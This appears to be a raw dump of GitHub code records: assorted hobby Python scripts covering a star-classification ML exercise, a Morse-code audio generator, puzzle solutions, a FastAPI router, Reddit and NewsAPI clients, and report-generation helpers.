PREPROCESAMIENTO\r\nstars_dataframe = pd.read_csv(\"stars.csv\")\r\n\r\n################################################\r\n## CARACTERISTICS\r\n\r\n#Temperature in Kelvin\r\nTemp = stars_dataframe['Temperature']\r\n\r\n#Relative Luminosity\r\nL = stars_dataframe['L']\r\n\r\n#Relative Radius\r\nR = stars_dataframe['R']\r\n\r\n#Absolute Magnitude\r\nAM = stars_dataframe['A_M']\r\n\r\n#General Obs. Color\r\n## Replace string to numbers/ 11 colors\r\nColors = stars_dataframe['Color']\r\nColor = Colors.str.upper().str.replace(\"-\",\" \")\r\nColor = Color.str.replace(\"WHITE YELLOW\",\"YELLOW WHITE\")\r\nAll_colors= Color.drop_duplicates().tolist() ## Se ve que hay 11 \r\ni=0\r\nfor x in All_colors:\r\n Color=Color.replace(x,i)\r\n i+=1\r\n\r\n#SMASS Spec.\r\n## Replace string to numbers/ 7 types\r\nSpec = stars_dataframe['Spectral_Class']\r\nSpec = Spec.str.upper()\r\nAll_Spec= Spec.drop_duplicates().tolist() ## Se ve que hay 7\r\ni=0\r\nfor x in All_Spec:\r\n Spec=Spec.replace(x,i)\r\n i+=1\r\n###############################################\r\n## LABELS\r\nTipos = stars_dataframe['Type']\r\n# Red Dwarf - 0\r\n#Brown Dwarf - 1\r\n#White Dwarf - 2\r\n#Main Sequence - 3\r\n#Super Giants - 4\r\n#Hyper Giants - 5\r\n################################################\r\n\r\n#Se guardan los datos limpios en csv\r\nstars_dataframe_clean = pd.concat([Temp,L,R,AM,Color,Spec,Tipos],axis=1)\r\nstars_dataframe_clean.to_csv('Stars_clean.csv', header=True, index=False)\r\nprint(stars_dataframe_clean)\r\n\r\n# SELECCION METODOS DE EVALUACION\r\nX_complete = stars_dataframe_clean.iloc[:,:-1].values\r\ny_complete = stars_dataframe_clean.iloc[:,-1].values\r\n\r\n# ## Se usaran los primeros 180 datos para entrenar \r\n# stars_train = stars_dataframe_clean.head(180)\r\n# X_train = stars_train.iloc[:,:-1].values\r\n# y_train = stars_train.iloc[:,-1].values\r\n\r\n# ## Se usaran los ultimos 60 datos para probar(10 tipo)\r\n# stars_test = stars_dataframe_clean.tail(60)\r\n# X_test = stars_test.iloc[:,:-1].values\r\n# y_test = stars_test.iloc[:,-1].values\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X_complete, y_complete, test_size=0.25, random_state=178)\r\n\r\n\r\n##################################################################################################################################\r\n\r\n## NORMALIZACION\r\nscaler = StandardScaler()\r\nscaler.fit(X_train)\r\nX_train = scaler.transform(X_train)\r\nX_test = scaler.transform(X_test)\r\n\r\n##################################################################################################################################\r\n\r\n## Representación y reducción dimensional \r\npca=PCA(n_components=3)\r\npca.fit(X_train)\r\nX_pca=pca.transform(X_train)\r\nX_pca_test=pca.transform(X_test)\r\nexpl =pca.explained_variance_ratio_\r\nmat_cov= pca.get_covariance()\r\nprint('\\n')\r\nprint(\"Matriz covarianza\",expl)\r\nprint('suma:',sum(expl[0:5]))\r\nprint('\\n')\r\n##Conservare 2 caracteristicas ya que con 2 la suma no disminuye mucho\r\n\r\n##################################################################################################################################\r\n\r\n## Entrenamiento Knn\r\nk_range = range(1, int(np.sqrt(len(y_train))))\r\ndis=['manhattan','chebyshev', 'minkowski']\r\n\r\nMCC=[]\r\nF1=[]\r\ndistancia=[]\r\nki=[]\r\nfor i in dis:\r\n for k in k_range:#Se varia k \r\n knn = KNeighborsClassifier(n_neighbors = k,weights='distance',metric=i, metric_params=None,algorithm='brute')\r\n knn.fit(X_train, y_train)\r\n y_pred=knn.predict(X_test)\r\n ## Metricas \r\n MCC.append(matthews_corrcoef(y_test,y_pred))\r\n F1.append(f1_score(y_test,y_pred,average='micro'))\r\n distancia.append(i)\r\n ki.append(k)\r\n\r\n## Metricas de evaluacion \r\nprint(\"########################################################################\"+\"\\n\")\r\nmaximo_MCC = MCC.index(max(MCC))\r\nprint(\"Con knn: Segun MCC({}) el mejor k es {} y la distancia es {}:\".format(max(MCC),ki[maximo_MCC],distancia[maximo_MCC]))\r\nmaximo_F1 = F1.index(max(F1))\r\nprint(\"Con knn: Segun F1({}) el mejor k es {} y la distancia es {}:\".format(max(F1),ki[maximo_F1],distancia[maximo_F1]))\r\n#print(classification_report(y_test, y_pred))\r\n\r\n##################################################################################################################################\r\n\r\nMCC=[]\r\nF1=[]\r\ndistancia=[]\r\nki=[]\r\n## Entrenamiento con PCA knn \r\nfor i in dis:\r\n for k in k_range:#Se varia k \r\n knn = KNeighborsClassifier(n_neighbors = k,weights='distance',metric=i, metric_params=None,algorithm='brute')\r\n knn.fit(X_pca, y_train)\r\n y_pred=knn.predict(X_pca_test)\r\n ## Metricas \r\n MCC.append(matthews_corrcoef(y_test,y_pred))\r\n F1.append(f1_score(y_test,y_pred,average='micro'))\r\n distancia.append(i)\r\n ki.append(k)\r\n\r\n## Metricas de evaluacion \r\nprint(\"\\n\"+\"########################################################################\"+\"\\n\")\r\nmaximo_MCC = MCC.index(max(MCC))\r\nprint(\"Con knn: Segun MCC({}) y PCA(2 componentes) el mejor k es {} y la distancia es {}:\".format(max(MCC),ki[maximo_MCC],distancia[maximo_MCC]))\r\nmaximo_F1 = F1.index(max(F1))\r\nprint(\"Con knn: Segun F1({}) y PCA(2 componentes) el mejor k es {} y la distancia es {}:\".format(max(F1),ki[maximo_F1],distancia[maximo_F1]))\r\n#print(classification_report(y_test, y_pred))\r\n\r\n\r\n##################################################################################################################################\r\n\r\n## Entrenamiento Logistic regresion\r\nprint(\"\\n\"+\"########################################################################\"+\"\\n\")\r\nDC=np.ones((len(X_train),1))\r\nDC_2= np.ones((len(X_test),1))\r\nX_train_lg = np.hstack((X_train,X_train**2,DC))\r\nX_test_lg = np.hstack((X_test,X_test**2,DC_2))\r\nclf = LogisticRegression(random_state=100, solver='liblinear', max_iter=100000000).fit(X_train_lg,y_train)\r\ny_predict_rg=clf.predict(X_test_lg)\r\nMCC_r=matthews_corrcoef(y_test,y_predict_rg)\r\nF1_r=f1_score(y_test,y_predict_rg,average='micro')\r\nprint(\"Con regresión logistica y una hipotesis X+X^2+1: el MCC es: \", MCC_r)\r\nprint(\"Con regresión logistica y una hipotesis X+X^2+1: el F1 es: \", F1_r)\r\n#print(classification_report(y_test, y_predict))\r\n\r\n##################################################################################################################################\r\n## Entrenamiento Logistic regresion y PCA\r\nprint(\"\\n\"+\"########################################################################\"+\"\\n\")\r\nDC=np.ones((len(X_pca),1))\r\nDC_2= np.ones((len(X_pca_test),1))\r\nX_train_lg = np.hstack((X_pca,X_pca**2,DC))\r\nX_test_lg = np.hstack((X_pca_test,X_pca_test**2,DC_2))\r\nclf = LogisticRegression(random_state=100, solver='liblinear', max_iter=100000000).fit(X_train_lg,y_train)\r\ny_predict=clf.predict(X_test_lg)\r\nMCC_r=matthews_corrcoef(y_test,y_predict)\r\nF1_r=f1_score(y_test,y_predict,average='micro')\r\nprint(\"Con regresión logistica, una hipotesis X+X^2+1 y PCA(2 componentes) : el MCC es: \", MCC_r)\r\nprint(\"Con regresión logistica, una hipotesis X+X^2+1 y PCA(2 componentes) : el F1 es: \", F1_r)\r\n#print(classification_report(y_test, y_predict))\r\n\r\n\r\n##################################################################################################################################\r\nprint(\"\\n\"+\"########################################################################\"+\"\\n\")\r\n#print(\"Segun lo analizado el mejor resultado se vio con regresión logistica sin usar PCA\")\r\n#print(classification_report(y_test, y_predict_rg))\r\n\r\n\r\n##################################################################################################################################\r\n\r\nF1=[]\r\ndistancia=[]\r\nki=[]\r\nsc=[]\r\nMCC=[]\r\n\r\nfor i in dis:\r\n for k in k_range:#Se varia k \r\n knn = KNeighborsClassifier(n_neighbors = k,weights='distance',metric=i, metric_params=None,algorithm='brute')\r\n scores = cross_val_score(knn, X_complete, y_complete, cv=5,scoring='f1_micro')\r\n mean = statistics.mean(scores)\r\n ki.append(k)\r\n distancia.append(i)\r\n F1.append(mean)\r\n #scores = cross_val_score(knn, X_complete, y_complete, cv=5,scoring='mcc')\r\n ##MCC.append(mean)\r\n\r\n\r\n\r\nmaximo_F1 = F1.index(max(F1))\r\nprint(\"Con knn y cross validation: Segun el promedio de F1({}) el mejor k es {} y la distancia es {}:\".format(max(F1),ki[maximo_F1],distancia[maximo_F1]))\r\n\r\n##################################################################################################################################\r\n\r\nF1=[]\r\nki=[]\r\nsc=[]\r\nMCC=[]\r\n\r\n\r\n# for k in k_range:#Se varia k \r\n# clf = svm.SVC(kernel='linear', C=k, random_state=42)\r\n# scores = cross_val_score(clf, X_complete, y_complete, cv=5,scoring='f1_micro')\r\n# mean = statistics.mean(scores)\r\n# ki.append(k)\r\n# F1.append(mean)\r\n\r\n \r\nclf = svm.SVC(kernel='linear', C=1, random_state=42)\r\nscores = cross_val_score(clf, X_complete, y_complete, cv=5,scoring='f1_micro')\r\nmean = statistics.mean(scores)\r\nki.append(1)\r\nF1.append(mean)\r\n\r\nmaximo_F1 = F1.index(max(F1))\r\nprint(\"Con SVM linear y cross validation: Segun el promedio de F1({}) el mejor C es {}:\".format(max(F1),ki[maximo_F1]))\r\n\r\n\r\n\r\n\r\n","repo_name":"marinho14/Stars-and-Machine-Learning","sub_path":"Estrellas_clas.py","file_name":"Estrellas_clas.py","file_ext":"py","file_size_in_byte":9797,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2401413074","text":"class Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if len(nums) <= 2:\n return len(nums)\n ptr = 2\n for index in range(2, len(nums)):\n if nums[index] != nums[ptr-2]:\n nums[ptr] = nums[index]\n ptr += 1\n \n return ptr\n","repo_name":"SouradeepSaha/leetcode","sub_path":"80. Remove Duplicates from Sorted Array II.py","file_name":"80. Remove Duplicates from Sorted Array II.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23082404699","text":"#!/usr/bin/env python3\n\"\"\"\nCode used to solve Advent of Code 2015 Day 2 exercise 1\nAdvent of Code 2015, Day 02, Exercise 1\n# https://adventofcode.com/2015\n\"\"\"\n\nimport os\n\n\ndef total_surface_area_parcel_in_sq_feet(length, width, height):\n \"\"\"\n > Given a parcel's length, width, and height, return the total surface area of\n the parcel in square feet\n \n :param length: The length of the parcel in inches\n :param width: the width of the box, in inches\n :param height: The height of the parcel in inches\n :return: The slack and the surface area\n \"\"\"\n sorted_dimensions = [length, width, height]\n sorted_dimensions.sort()\n slack = sorted_dimensions[0] * sorted_dimensions[1]\n surface_area = (2 * length * width) + (2 * width * height) + (2 * length * height)\n\n return slack + surface_area\n\n\ndef total_wrapping_paper_in_sq_feet(file_name):\n \"\"\"\n It reads the file line by line, splits the line into three parts, converts the\n three parts into integers, and then passes the three integers to the function\n total_surface_area_parcel_in_sq_feet.\n\n The function total_surface_area_parcel_in_sq_feet returns the total surface\n area of the parcel in square feet.\n\n The function total_wrapping_paper_in_sq_feet adds the total surface area of the\n parcel to the total wrapping paper.\n\n The function total_wrapping_paper_in_sq_feet returns the total wrapping paper\n in square feet\n\n :param file_name: The name of the file that contains the dimensions of the\n parcels\n :return: The total wrapping paper in square feet.\n \"\"\"\n with open(file_name, \"r\", encoding=\"utf-8\") as file:\n total_wrapping_paper = 0\n while True:\n line = file.readline()\n if not line:\n break\n length = int(line.split(\"x\")[0])\n width = int(line.split(\"x\")[1])\n height = int(line.split(\"x\")[2]) \n total_wrapping_paper += total_surface_area_parcel_in_sq_feet(length, width, height) \n\n return total_wrapping_paper\n\n\ndef main():\n \"\"\"\n It takes a file name as input, reads the file, and returns the total amount of\n wrapping paper needed to wrap all the presents in the file\n \"\"\"\n os.system(\"cls || clear\")\n\n file_name_test_file = \"C:/source/repos/AdventOfCode/AOC_2015/Day_02/test_file.txt\"\n file_name_puzzle_file = \"C:/source/repos/AdventOfCode/AOC_2015/Day_02/puzzle_input_file.txt\"\n test_file_answer = total_wrapping_paper_in_sq_feet(file_name_test_file)\n puzzle_file_answer = total_wrapping_paper_in_sq_feet(file_name_puzzle_file)\n print(f\"test file: {test_file_answer}\")\n print(f\"puzzle file: {puzzle_file_answer}\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"LordFuture/AdventOfCode","sub_path":"AOC_2015/Day_02/ex_01.py","file_name":"ex_01.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31676723358","text":"\n## Este script se usará para leer y transformar el conjunto de datos\n\nimport numpy as np\nfrom df_to_class import read_playlist\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\ndanceability_index = 0 \nenergy_index = 1\nkey_index = 2\nloudness_index = 3\nmode_index = 4\nspeechiness_index = 5\nacousticness_index = 6 \ninstrumentalness_index = 7 \nliveness_index = 8\nvalence_index = 9\ntempo_index = 10 \nduration_ms_index = 11 \ntime_signature_index = 12\npopularity_track_index = 13 \npopularity_album_index = 14\npopularity_artist_index = 15\n\n## Selecciona solo los atributos que aparecen en la lista de columnas\n# @param columnas lista de nombres de columnas\n# @param cancion objeto track\n# @return una lista con los atributos seleccionados de esa canción\ndef proyeccion_unitaria(columnas, cancion):\n lista = []\n for c in columnas:\n lista.append(cancion.features[c])\n return lista\n\n## Obtiene un diccionario de artistas. Mapea el nombre de un artista con un número.\ndef get_dict_artist(playlists):\n dict = {}\n indice = 1\n for pl in playlists:\n for song in pl.tracks:\n if not (song.artist_name in dict.keys()):\n dict[song.artist_name] = float(indice)\n indice += 1\n return dict\n\n## recibe una lista de playlists y devuelve dos arreglos, X y y.\ndef transforma_playlist(cs, playlists):\n X_list = []\n y_list = []\n for pl in playlists:\n for song in pl.tracks:\n X_list.append(proyeccion_unitaria(cs, song))\n y_list.append(pl.id)\n return (np.array(X_list), np.array(y_list))\n\n## Reescala el conjunto de datos X.\ndef reescala(X):\n scaler = StandardScaler().fit(X)\n return scaler.transform(X)\n\ndef ms_a_minutos(X_in):\n X_in[:,duration_ms_index] = (X_in[:,duration_ms_index] / 1000) / 60\n\n## Obtiene una combinación lineal de las popularidades.\n# @return la concatenación de X_in con la nueva columna de popularidad\ndef popularidad(X_in):\n track = X_in[:,popularity_track_index]\n artist = X_in[:,popularity_artist_index]\n album = X_in[:,popularity_album_index]\n popularity = np.zeros((track.shape))\n popularity = 3*track + 2*artist + album\n popularity_column = popularity[:,np.newaxis]\n return np.concatenate([X_in, popularity_column], axis=1)\n\ndef calcula_popularidad_index(X_in):\n I = np.zeros((X_in.shape[0], 1))\n I = 3*X_in[:, popularity_track_index] + 2*X_in[:, popularity_artist_index] + X_in[:, popularity_album_index]\n X_in = np.concatenate((X_in, I.reshape(-1,1)), axis=1)\n return X_in\n\ndef normaliza(X_in):\n # Columnas que si se deben normalizar\n indexes = [c for c in range(0,16) if c != loudness_index and c != duration_ms_index]\n # Entrena y transforma usando solo las columnas\n transformer = StandardScaler().fit(X_in[:, indexes])\n XN = transformer.transform(X_in[:, indexes])\n # Concatenar las columnas transformadas con las 2 restantes\n XZ = np.concatenate((XN[:, [0,1,2]], X_in[:,loudness_index].reshape(-1,1)), axis=1)\n XZ = np.concatenate((XZ[:,:], XN[:,[3,4,5,6,7,8,9]]), axis=1)\n XZ = np.concatenate((XZ[:,:], X_in[:,duration_ms_index].reshape(-1,1)), axis=1)\n XZ = np.concatenate((XZ[:,:], XN[:,[10,11,12,13]]), axis=1)\n return transformer, XZ \n\ndef interesting(X_int):\n I = np.zeros((X_int.shape[0], 1))\n I = X_int[:, loudness_index] + X_int[:, tempo_index] + (X_int[:, energy_index]) * 100 + (X_int[:, danceability_index]) * 100 + (X_int[:, acousticness_index]) * 100 \n X_int = np.concatenate((X_int, I.reshape(-1,1)), axis=1)\n return X_int\n\ndef transforma_test(transformer, X_in):\n indexes = [c for c in range(0,16) if c != loudness_index and c != duration_ms_index]\n XTT = transformer.transform(X_in[:, indexes])\n XT = np.concatenate((XTT[:, [0,1,2]], X_in[:,loudness_index].reshape(-1,1)), axis=1)\n XT = np.concatenate((XT[:,:], XTT[:,[3,4,5,6,7,8,9]]), axis=1)\n XT = np.concatenate((XT[:,:], X_in[:,duration_ms_index].reshape(-1,1)), axis=1)\n XT = np.concatenate((XT[:,:], XTT[:,[10,11,12,13]]), axis=1)\n return XT\n\ndef preprocessing(x_train, x_test):\n ms_a_minutos(x_test)\n ms_a_minutos(x_train)\n transformer, x_train = normaliza(x_train)\n x_train = interesting(x_train)\n x_test = transforma_test(transformer, x_test)\n x_test = interesting(x_test)\n x_train = calcula_popularidad_index(x_train)\n x_test = calcula_popularidad_index(x_test)\n return x_train, x_test\n\n## Lee y obtiene el conjunto de datos en crudo\ndef obten():\n proy = ['danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness',\n 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo', \n 'duration_ms', 'time_signature', 'popularity_track', 'popularity_album', 'popularity_artist']\n playlist_set = read_playlist('dataset/mpd.slice.0-999-features-v2.json')\n return transforma_playlist(proy, playlist_set)\n\n## Devuelve los datos preprocesados\ndef obten2():\n X, y = obten()\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n X_train_pp, X_test_pp = preprocessing(X_train, X_test)\n return (np.concatenate([X_train_pp, X_test_pp], axis=0), np.concatenate([y_train, y_test], axis = 0))\n\ndef main():\n X, y = obten2()\n print('X.shape', X.shape)\n print('y.shape', y.shape)\n\n\n","repo_name":"rodrigofvc/music-recommendations-spotify","sub_path":"src/read_ds.py","file_name":"read_ds.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11707212395","text":"from fastapi import APIRouter, Depends, HTTPException, Request\nfrom dbsession import DBSession\nfrom deps import get_db\n\nrouter = APIRouter()\n\n\n@router.get(\"/users/\", tags=[\"users\"])\nasync def read_users(request: Request):\n version = await request.app.state.db.version()\n\n return {\n \"db\": version,\n \"users\": [\n {\n \"username\": \"Rick\"\n },\n {\n \"username\": \"Morty\"\n }\n ]\n }\n\n\n@router.get(\"/users/me\", tags=[\"users\"])\nasync def read_user_me(request: Request):\n return {\"username\": \"fakecurrentuser\"}\n\n\n@router.get(\"/users/{username}\", tags=[\"users\"])\nasync def read_user(request: Request, username: str):\n data = await request.app.state.db.get_user(username)\n if not data:\n raise HTTPException(status_code=422, detail=\"Item not found\")\n # return {\"error\": \"that users does not exist in the db\"}\n return data\n\n\n@router.post(\"/users/\")\nasync def create_user(request: Request):\n data = await request.json()\n await request.app.state.db.add_user(data)\n return data\n","repo_name":"datajango/python-meetup-group-2022-10-12","sub_path":"backend04/routers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11316699785","text":"import wave\r\nimport random\r\nimport struct\r\nimport time\r\nimport winsound\r\nimport math\r\nimport sys\r\n\r\n\r\ndef makeWave(length, freq = 1000, amplitude = 1):\r\n\ttemp = []\r\n\tfor i in range(length):\r\n\t\tramp = 1-2**(-.01*(length-i-1))-2**(-.01*i)\r\n\t\tvalue = int(ramp*amplitude*2**15*math.sin(i*freq*2*math.pi/44100))\r\n\t\tpacked_value = struct.pack('h', value)\r\n\t\ttemp.append(packed_value)\r\n\treturn b''.join(temp)\r\n\r\n\r\ndef makeMorse(letter, morse_dict, speed = 1):\r\n\tmorse = []\r\n\tfor digit in morse_dict[letter]:\r\n\t\tif digit == '1':\r\n\t\t\tmorse.append(makeWave(int(20000/speed), 880))\r\n\t\telif digit == '2':\r\n\t\t\tmorse.append(makeWave(int(40000/speed), 880))\r\n\t\telse:\r\n\t\t\tmorse.append(makeWave(int(20000/speed), 880, 0))\r\n\t\tmorse.append(makeWave(int(20000/speed), 880, 0))\r\n\treturn b''.join(morse)\r\n\r\n\r\ndef restartLine():\r\n sys.stdout.write('\\r')\r\n sys.stdout.flush()\r\n\r\n\r\nmorse_dict = {'!': '000', '?': '000', '\\n': '00000', ' ': '00', '.': '000', ',': '0', 'a': '12', 'b': '2111', 'c': '2121', 'd': '211', 'e': '1', 'f': '1121', 'g': '221', 'h': '1111', 'i': '11', 'j': '1222', 'k': '212', 'l': '1211', 'm': '22', 'n': '21', 'o': '222', 'p': '1221', 'q': '2212', 'r': '121', 's': '111', 't': '2', 'u': '112', 'v': '1112', 'w': '122', 'x': '2112', 'y': '2122', 'z': '2211', '1': '12222', '2': '11222', '3': '11122', '4': '11112', '5': '11111', '6': '21111', '7': '22111', '8': '22211', '9': '22221', '0': '22222'}\r\n\r\n#inp = []\r\ns=''\r\ntry:\r\n\twhile True:\r\n\t\ts += '\\n' + str(input())\r\n\t\t#inp.append(s)\r\nexcept:\r\n\tpass\r\n\r\ninput_string = s\r\n#input_string = str(input('Text: '))\r\n#speed = float(input('Speed: '))\r\nspeed = 5\r\n\r\nt0 = time.clock()\r\n\r\noutput = wave.open('morsefile.wav', 'w')\r\noutput.setparams((2, 2, 44100, 0, 'NONE', 'compressed'))\r\n\r\nvalues = []\r\ncount = 0\r\nlength = len(input_string)\r\n\r\nprint('\\n Generating morse code...')\r\n\r\nfor letter in input_string:\r\n\ttry:\r\n\t\tvalues.append(makeMorse(letter.lower(), morse_dict, speed))\r\n\t\tvalues.append(makeWave(int(30000/speed), 0))\r\n\t\tcount += 1\r\n\t\trestartLine()\r\n\t\tsys.stdout.write(' |' + int(30*count/length)*'=' + (30-int(30*count/length))*' ' + '| ' + str(round(100*count/length)) + '%')\r\n\t\tsys.stdout.flush()\r\n\texcept KeyError:\r\n\t\tpass\r\n\r\n\r\nvalue_str = b''.join(values)\r\noutput.writeframes(value_str)\r\n\r\noutput.close() \r\n\r\nprint('\\n Complete! Elapsed time:', round(time.clock()-t0, 3), 'seconds.')\r\nprint(' Playing generated morse code...')\r\n\r\nwinsound.PlaySound('morsefile.wav', winsound.SND_ASYNC | winsound.SND_FILENAME)\r\nduration = output.getnframes() / output.getframerate()\r\ntime.sleep(duration)\r\nprint(' Completed!')","repo_name":"maxbergmark/old-work","sub_path":"Egna projekt/morsewav.py","file_name":"morsewav.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27424564978","text":"from __future__ import print_function\nimport redis\n\n# Create connection to localhost Redis\nclient = redis.StrictRedis(host=\"localhost\", port=6379)\n\nuser = \"users:id:992452\"\nclient.set(user, '{\"name\": \"Tina\", \"sex\": \"female\", \"grade\": \"A\"}')\n\n# Read the lua scripts from file\nwith open(\"updateJson.lua\") as f:\n lua = f.read()\n\n #Create Redis Script instance\n updateJson = client.register_script(lua)\n\n #Invoke lua script using the script instance\n updateJson(keys=[user], args=['{\"grade\": \"C\"}'])\n\n print(client.get(user))\n\n\n\n\n\n","repo_name":"PacktPublishing/Redis-4.x-Cookbook","sub_path":"Chapter04/python/RedisLuaDemo.py","file_name":"RedisLuaDemo.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"} +{"seq_id":"2126610617","text":"from django import forms\nfrom .models import *\nfrom member.models import User as UserAb\n\n\nclass PetForm(forms.ModelForm):\n class Meta:\n model = Pet\n fields = '__all__'\n labels = {'pet_name':'펫이름', 'gender':'성별',\n 'size':'분류', 'neutered':'중성화', 'pet_img':'펫프사'}\n\nclass UserAbForm(forms.ModelForm):\n class Meta:\n model = UserAb\n fields = ['username', 'first_name', 'email', 'profile_img', 'user_ph', 'last_name']\n labels = {'username' : 'ID', 'first_name' : '이름', 'email':'email', 'profile_img' : '프로필 사진', 'user_ph':'연락처', 'last_name' : '주소'}","repo_name":"Jinnny-An/Pet-Dada","sub_path":"mypageapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72948101633","text":"import numpy as np\n\nBLOOM_FILTER = np.zeros((2^8))\n\ndef add(elem):\n for idx in range(7):\n hsh = md5(f\"{idx}-{elem}\".encode('utf-8')).hexdigest()\n pos = int(hsh[:2], 16)\n BLOOM_FILTER[idx][pos] =1\n\ndef find(elem):\n presence = []\n for idx in range(7):\n hsh = md5(f\"{idx}-{elem}\".encode('utf-8')).hexdigest()\n pos = int(hsh[:2], 16)\n presence.append(BLOOM_FILTER[pos])\n\n return all(presence)","repo_name":"galathinius/real-time-programming","sub_path":"examples/bloom_filter.py","file_name":"bloom_filter.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36559786148","text":"import json\nimport time\nfrom typing import Union\nfrom abc import ABC, abstractmethod\n\nimport requests\n\nimport settings\nimport models\n\n\nclass BaseAPI:\n \n @abstractmethod\n def get_news_list(self, q: Union[str, None] = 'e') -> list:\n pass\n \n\n\nclass RedditAPI(BaseAPI):\n\n URL = 'https://www.reddit.com'\n source_name = 'reddit'\n\n def __init__(self) -> None:\n self.token = None\n self.token_time = None\n\n def get_token(self):\n if self.token is None or (self.token_time is not None\n and time.time() - self.token_time > 3590):\n response = requests.post(\n f'{self.URL}/api/v1/access_token',\n data={\n 'grant_type': 'password',\n 'username': settings.REDDIT_USERNAME,\n 'password': settings.REDDIT_PASSWORD\n },\n headers={\n 'user-agent':\n f'{settings.REDDIT_APP_NAME} by {settings.REDDIT_USERNAME}'\n },\n auth=requests.auth.HTTPBasicAuth(settings.REDDIT_APP_ID,\n settings.REDDIT_APP_SECRET))\n response_json = response.json()\n self.token = response_json['access_token']\n self.token_time = time.time()\n return self.token\n\n def get_news_list(self, q: Union[str, None] = 'e ') -> list:\n url = 'https://oauth.reddit.com/subreddits/search?'\n if q:\n url += f'q={q}'\n response = requests.get(\n url=url,\n params=dict(sort='relevance', limit=25),\n headers={\n 'Authorization':\n f'bearer {self.get_token()}',\n 'User-Agent':\n f'{settings.REDDIT_APP_NAME} by {settings.REDDIT_USERNAME}'\n })\n response_json = response.json()\n news_list = []\n if response_json:\n for element in response_json['data']['children']:\n a = element['data']\n news_list.append(\n models.News(headline=a['title'],\n link=self.URL + a['url'],\n source=self.source_name,\n image_url=a['header_img']))\n return news_list\n\n\nclass NewsAPI(BaseAPI):\n\n URL = 'https://newsapi.org/v2'\n source_name = 'newsapi'\n\n def __init__(self) -> None:\n pass\n\n def get_news_list(self, q: Union[str, None] = 'e') -> list:\n url = f'{self.URL}/everything?'\n if q:\n url += f'q={q}'\n response = requests.get(url=url,\n params=dict(apiKey=settings.NEWS_API_KEY,\n language='en')).json()\n if 'articles' not in response:\n raise Exception(\n 'Unexpected respinse from NewsAPI. \"{}\"'.format(response))\n news_list = []\n for a in response['articles']:\n news_list.append(\n models.News(headline=a['title'],\n link=a['url'],\n source=self.source_name,\n image_url=a['urlToImage']))\n return news_list","repo_name":"Tsegaab/z-new-api","sub_path":"news_source.py","file_name":"news_source.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40081453445","text":"from csv import reader\nimport sys, argparse\nimport pdb\n\ndef main( argv ):\n parser = argparse.ArgumentParser( prog='make_sedfiles.py', \n description=\\\n 'Make a sedfile for each of the CDs/States in the input CSV,' \\\n ' and a make_reports.sh that will call the sedfiles' )\n parser.add_argument( '-c', '--cds_file', required=True,\n help='The CDs to work with' )\n parser.add_argument( '-s', '--states_file', required=True,\n help='The state names' )\n my_args = parser.parse_args()\n\n # pdb.set_trace()\n cds_todo_file = my_args.cds_file\n states_file = my_args.states_file\n\n template_filename = \"NY14_template.Rmd\"\n template_state_cd = \"New York's 14th\" \n template_cd = \"14th\"\n template_st = \"NY\"\n template_data_date = \"102320\"\n data_date = \"102320\"\n bash_name = \"make_reports.sh\"\n \n with open( cds_todo_file, 'r' ) as read_obj:\n csv_reader = reader( read_obj )\n state_cds = list( map( tuple, csv_reader ))\n with open( states_file, 'r' ) as read_obj:\n csv_reader = reader( read_obj )\n state_name_list = list( map( tuple, csv_reader ))\n state_names = {}\n for state_abbr, state_name in state_name_list:\n state_names[ state_abbr ] = state_name\n with open( bash_name, \"w\" ) as bash_obj:\n for state, cd in state_cds:\n target_file = \"New/{}{}_2020.Rmd\".format( state, cd )\n cd = int( cd )\n sed_name = \"SEDs/sedfile_{}{}.txt\".format( state, cd )\n with open( sed_name, \"w\" ) as write_obj:\n suff = \"th\"\n if ( cd == 1 or cd == 21 or cd == 31 or cd == 41 or cd == 51 ):\n suff = \"st\"\n elif ( cd == 2 or cd == 22 or cd == 32 or cd == 42 or cd == 52 ):\n suff = \"nd\"\n elif ( cd == 3 or cd == 23 or cd == 33 or cd == 43 or cd == 53 ):\n suff = \"rd\"\n str = \"s/{}/{} {}{}/g\\n\".format( template_state_cd, state_names[state],\n cd, suff )\n write_obj.write( str )\n str = \"s/NY 14/{} {}/g\\n\".format( state, cd )\n write_obj.write( str )\n str = \"s/_NY-14/_{}-{}/g\\n\".format( state, cd )\n write_obj.write( str )\n str = \"s/NY14/{}{}/g\\n\".format( state, cd )\n write_obj.write( str )\n str = \"s/_NY-/_{}-/g\\n\".format( state )\n write_obj.write( str )\n if ( template_data_date != data_date ):\n str = \"s/{}/{}\\n\".format( template_data_date, data_date )\n write_obj.write( str )\n str = \"sed -f {} {} > {}\\n\".format( sed_name, template_filename,\n target_file )\n bash_obj.write( str ) \n\nif __name__ == \"__main__\":\n main( sys.argv[1:] 